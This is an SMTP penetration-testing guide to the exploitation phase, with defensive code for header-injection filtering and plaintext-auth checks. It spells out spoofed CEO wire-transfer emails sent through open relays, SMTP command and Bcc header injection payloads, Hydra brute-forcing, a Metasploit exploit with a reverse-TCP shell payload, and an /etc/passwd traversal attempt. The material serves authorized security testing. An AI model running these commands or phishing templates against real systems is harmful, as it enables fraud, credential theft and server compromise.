SMTP Pentest Guide

Exploitation Phase

The exploitation phase involves leveraging the vulnerabilities identified during previous phases to demonstrate the real-world impact of these security weaknesses. This phase requires careful execution and thorough documentation.

Warning: Only perform exploitation on systems you have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.

Exploiting Open Mail Relays

Open mail relays can be exploited to send unauthorized emails, potentially for spam or phishing.

Exploiting an Open Relay

Sending an email through an open relay server

    telnet mail.example.com 25
    HELO pentest.local
    MAIL FROM: <ceo@victim-company.com>
    RCPT TO: <employee@victim-company.com>
    DATA
    From: CEO <ceo@victim-company.com>
    To: employee@victim-company.com
    Subject: Urgent Wire Transfer

    Please wire $10,000 to the following account immediately.
    Bank: Example Bank
    Account: 1234567890
    .
    QUIT
Explanation: This example demonstrates sending a spoofed email through an open relay. The attacker is pretending to be the CEO and sending instructions to an employee. The '250 2.0.0 Ok: queued' response indicates the server accepted the message for delivery. In a real pentest, you would send to an address you control to demonstrate the vulnerability without affecting real users.

Using swaks for Relay Testing

A more sophisticated tool for testing SMTP

    swaks --from ceo@victim-company.com \
          --to employee@victim-company.com \
          --server mail.example.com \
          --header 'Subject: Urgent Action Required' \
          --body 'Please review the attached document ASAP.' \
          --attach /path/to/report.pdf
Explanation: Swaks (Swiss Army Knife for SMTP) is a versatile tool for testing SMTP servers. This command sends an email with an attachment through the target server. Swaks handles the MIME encoding and other details automatically, making it useful for more complex testing scenarios.

Exploiting SMTP Injection

SMTP injection vulnerabilities can allow attackers to manipulate email content or send unauthorized messages through web applications [^4].

SMTP Injection Through Web Forms

Exploiting a vulnerable web contact form

    Name: Legitimate User
    Email: attacker@evil.com
    Message: This is a normal message.
    .
    MAIL FROM: <admin@victim.com>
    RCPT TO: <finance@victim.com>
    DATA
    From: Admin <admin@victim.com>
    To: Finance <finance@victim.com>
    Subject: Urgent: Update Payment Details

    Please update the payment account for our vendor to:
    Bank: Evil Bank
    Account: 1234567890
    .
Explanation: This attack targets a web application that doesn't properly sanitize user input before passing it to an SMTP server. The payload attempts to terminate the current message with a period on a new line (SMTP's end-of-data marker), then inject new SMTP commands to send an unauthorized email that appears to come from admin@victim.com. This technique can be used for phishing or social engineering [^4].

SMTP Header Injection

Injecting additional headers into an email

    Name: Test User
    Email: test@example.com
    Message: Testing
    Bcc: all-employees@victim.com
Explanation: This simpler injection adds a Bcc header to include additional recipients that weren't intended by the application. If successful, the message would be sent to all employees without the primary recipient knowing. Other header injections might add Reply-To headers to capture replies or Content-Type headers to attempt XSS attacks in HTML email clients.
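The two injections above succeed only when form fields are pasted into raw header lines. The following is an added example, not code from the guide: the vulnerable builder pattern beside a hardened one that rejects CR/LF in header-bound fields; the address format regex, the contact@example.com recipient and the form values are assumptions.

```python
import re
from email.message import EmailMessage
from email.utils import formataddr

# Added example, not from the guide. Recipient address and form values are made up.

# One CR or LF inside a value interpolated into the header block ends the
# current header line, which is all a smuggled "Bcc:" line needs.
CRLF = re.compile(r"[\r\n]")
# Deliberately strict: local part, one "@", dotted domain, no whitespace or
# angle brackets (\s covers CR/LF, so a folded payload fails here too).
SIMPLE_ADDR = re.compile(r"^[^\s@<>]+@[^\s@<>]+\.[^\s@<>]+$")


class HeaderInjectionRejected(ValueError):
    """Raised when a form field would add or alter a header."""


def build_message_unsafe(name, sender, body):
    """Vulnerable pattern: form fields pasted straight into raw header lines."""
    return (f"From: {name} <{sender}>\r\n"
            "To: contact@example.com\r\n"
            "Subject: Website contact form\r\n"
            "\r\n" + body)


def header_names(raw):
    """Lower-cased header field names of a raw message (for inspection)."""
    head = raw.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0].strip().lower() for line in head.split("\r\n")]


def build_message_safe(name, sender, body):
    """Hardened builder: refuse CR/LF in header-bound fields, validate the
    address shape, and let EmailMessage serialise the headers."""
    for field, value in (("name", name), ("email", sender)):
        if CRLF.search(value):
            raise HeaderInjectionRejected(f"CR/LF in form field {field!r}")
    if not SIMPLE_ADDR.match(sender):
        raise HeaderInjectionRejected("email field is not a plain address")
    msg = EmailMessage()
    msg["From"] = formataddr((name, sender))   # quotes the display name if needed
    msg["To"] = "contact@example.com"
    msg["Subject"] = "Website contact form"
    msg.set_content(body)                      # body text can never reach headers
    return msg
```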

Exploiting Authentication Weaknesses

Weak authentication mechanisms can allow unauthorized access to email accounts or services.

Dictionary Attack on SMTP Authentication

Using Hydra to brute force SMTP credentials

    hydra -l admin -P /path/to/wordlist.txt smtp://mail.example.com
Explanation: Hydra is a versatile tool for performing dictionary attacks. This command attempts to authenticate as 'admin' using passwords from a wordlist. Successfully finding credentials could allow an attacker to send emails as a legitimate user, access stored messages, or use the server for further attacks.

Testing Authentication without TLS

Demonstrating credential exposure

    telnet mail.example.com 25
    EHLO pentest.local
    AUTH LOGIN
    dXNlcm5hbWU=
    cGFzc3dvcmQ=
Explanation: This example shows attempting to authenticate without first establishing TLS encryption. The username and password are sent in base64 encoding (dXNlcm5hbWU= is 'username' and cGFzc3dvcmQ= is 'password'), which is easily decoded. If the server allows authentication without TLS, credentials can be intercepted by anyone monitoring the network.
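Whether that exposure exists is visible in the EHLO reply before any AUTH command is sent. The following is an added example, not code from the guide: it parses a capability list (a constructed reply, not a real capture) and reports whether plaintext mechanisms are offered on the unencrypted session; the same classifier can be run against a server you administer via smtplib's esmtp_features. The risk labels are assumptions.

```python
import smtplib

# Added example, not from the guide. SAMPLE_EHLO is a constructed reply.
# RFC 4954 says a server SHOULD NOT offer PLAIN/LOGIN before TLS is in place.
PLAINTEXT_MECHS = {"PLAIN", "LOGIN"}


def parse_ehlo(reply: str) -> dict:
    """Turn a raw multi-line EHLO reply into {feature: params} with
    lower-cased keys, the shape smtplib keeps in SMTP.esmtp_features."""
    features = {}
    lines = reply.replace("\r\n", "\n").strip().split("\n")
    for line in lines[1:]:                 # first line is the server greeting
        if not line.startswith("250"):
            continue
        body = line[4:].strip()            # drop "250-" or "250 "
        name, _, params = body.partition(" ")
        features[name.lower()] = params.strip()
    return features


def plaintext_auth_exposure(features: dict) -> dict:
    """Classify the pre-TLS capability list (assumed risk labels)."""
    mechs = set(features.get("auth", "").upper().split())
    has_starttls = "starttls" in features
    exposed = bool(mechs & PLAINTEXT_MECHS)
    if exposed:
        # STARTTLS present but AUTH still advertised first: clients may
        # still log in unencrypted. No STARTTLS at all: they have no choice.
        risk = "medium" if has_starttls else "high"
    else:
        risk = "none"
    return {"auth_before_tls": sorted(mechs), "starttls": has_starttls,
            "plaintext_mechs_offered": exposed, "risk": risk}


def check_live(host: str, port: int = 25) -> dict:
    """Same check against a server you administer (not exercised offline)."""
    with smtplib.SMTP(host, port, timeout=10) as s:
        s.ehlo("pentest.local")
        return plaintext_auth_exposure(s.esmtp_features)


SAMPLE_EHLO = ("250-mail.example.com\r\n"
               "250-STARTTLS\r\n"
               "250-AUTH LOGIN PLAIN\r\n"
               "250 8BITMIME\r\n")
```

The remediation this checks for is the server advertising AUTH only after STARTTLS has completed (and rejecting AUTH on the plaintext session), which also makes the telnet transcript above fail at the AUTH LOGIN step.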

Exploiting Server-Specific Vulnerabilities

Software-specific vulnerabilities may require specialized exploits based on the SMTP server identified during scanning.

Using Metasploit for CVE Exploitation

Exploiting a known vulnerability

    msfconsole
    use exploit/windows/smtp/ms07-017_ani_loadimage_chunksize
    set RHOST mail.example.com
    set PAYLOAD windows/shell/reverse_tcp
    set LHOST 192.168.1.100
    run
Explanation: This example shows using Metasploit to exploit a vulnerability in Microsoft Exchange Server. The exploit targets a buffer overflow in the Windows animated cursor handling. If successful, it provides command shell access to the server, demonstrating critical impact. Real penetration tests should use the minimum necessary force to demonstrate vulnerabilities.

Testing SMTP Traversal Attack

Exploiting a path traversal vulnerability

    telnet mail.example.com 25
    HELO pentest.local
    MAIL FROM: <test@example.com>
    RCPT TO: <../../../../../../etc/passwd@example.com>
Explanation: This attempts to exploit a path traversal vulnerability as described in the document [^4]. The attack tries to manipulate the RCPT TO field to access files outside the intended directory. A vulnerable server might try to deliver mail to a system file like /etc/passwd, potentially allowing file access or denial of service.

Post-Exploitation

After successfully exploiting a vulnerability, document the access gained and potential impact:

  • What level of access was obtained?
  • What data could be accessed or modified?
  • Could this vulnerability be used to pivot to other systems?
  • What business impact would this exploit have if performed by a malicious actor?

Responsible Exploitation

Always follow these principles during the exploitation phase:

  • Only exploit vulnerabilities within the agreed scope
  • Minimize impact on production systems
  • Avoid affecting real users when demonstrating vulnerabilities
  • Document all actions thoroughly
  • Do not extract sensitive data unless explicitly authorized
  • Clean up after testing (remove test accounts, files, etc.)